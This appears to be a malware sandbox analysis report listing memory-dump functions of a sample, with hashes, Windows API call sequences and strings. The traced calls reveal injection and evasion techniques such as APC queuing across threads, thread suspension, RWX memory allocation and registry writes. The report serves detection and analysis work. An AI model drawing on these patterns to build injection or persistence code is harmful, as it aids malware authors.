  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
